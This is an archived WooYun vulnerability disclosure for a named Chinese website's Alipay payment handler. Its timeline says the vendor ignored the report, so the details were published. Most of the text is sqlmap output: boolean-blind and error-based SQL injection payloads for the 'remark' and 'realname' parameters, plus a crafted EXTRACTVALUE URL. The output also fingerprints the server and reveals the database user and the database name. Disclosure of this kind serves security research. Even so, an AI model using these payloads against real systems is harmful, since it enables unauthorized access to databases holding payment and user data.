乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-18: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-02: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://www.3hk.cn/index.php?action=alipay&ctr=simplepaycorderid=&payway=99bill&realname=1' AND EXTRACTVALUE(4393,CONCAT(0x5c,0x71786a6271,'~',user(),'~',0x717a6b6271)) AND 'a'='a&remark=1&total_fee=1&type=
---Parameter: remark (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: corderid=&payway=99bill&realname=1&remark=1' RLIKE (SELECT (CASE WHEN (8123=8123) THEN 1 ELSE 0x28 END)) AND 'sauZ'='sauZ&total_fee=1&type= Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: corderid=&payway=99bill&realname=1&remark=1' AND EXTRACTVALUE(4393,CONCAT(0x5c,0x71786a6271,(SELECT (ELT(4393=4393,1))),0x717a6b6271)) AND 'UVpD'='UVpD&total_fee=1&type=Parameter: realname (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: corderid=&payway=99bill&realname=1' RLIKE (SELECT (CASE WHEN (3620=3620) THEN 1 ELSE 0x28 END)) AND 'gzaq'='gzaq&remark=1&total_fee=1&type= Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: corderid=&payway=99bill&realname=1' AND EXTRACTVALUE(4616,CONCAT(0x5c,0x71786a6271,(SELECT (ELT(4616=4616,1))),0x717a6b6271)) AND 'Catr'='Catr&remark=1&total_fee=1&type=---web application technology: PHP 5.4.27, Apache 2.2.27back-end DBMS: MySQL 5.1current user: 'h235462@localhost'current user is DBA: Falseavailable databases [1]:[*] dbh235462
~~
未能联系到厂商或者厂商积极拒绝
